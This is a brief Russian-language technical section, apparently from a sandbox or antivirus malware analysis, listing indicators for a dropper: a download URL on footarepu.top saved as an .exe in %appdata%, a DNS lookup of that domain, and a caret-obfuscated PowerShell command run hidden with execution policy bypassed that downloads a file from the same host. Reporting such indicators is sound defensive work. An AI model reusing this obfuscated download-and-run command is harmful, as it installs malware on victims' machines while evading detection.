Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^weRSH^eL^l.EXE^ ^-exECuTiOn^P^oLi^cy^ by^pASs^ ^-NOProFI^LE -WIN^dow^s^TY^LE ^Hid^de^n (N^EW^-ObJEct sYSTe^M.neT^.^w^ebC^l^IenT^).^d^owNlOA^DFI^L^e('http://footarepu.to...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "pO^weRSH^eL^l.EXE^ ^-exECuTiOn^P^oLi^cy^ by^pASs^ ^-NOProFI^LE -WIN^dow^s^TY^LE ^Hid^de^n (N^EW^-ObJEct sYSTe^M.neT^.^w^ebC^l^IenT^).^d^owNlOA^DFI^L^e('http://footarepu.to...' (со скрытым окном)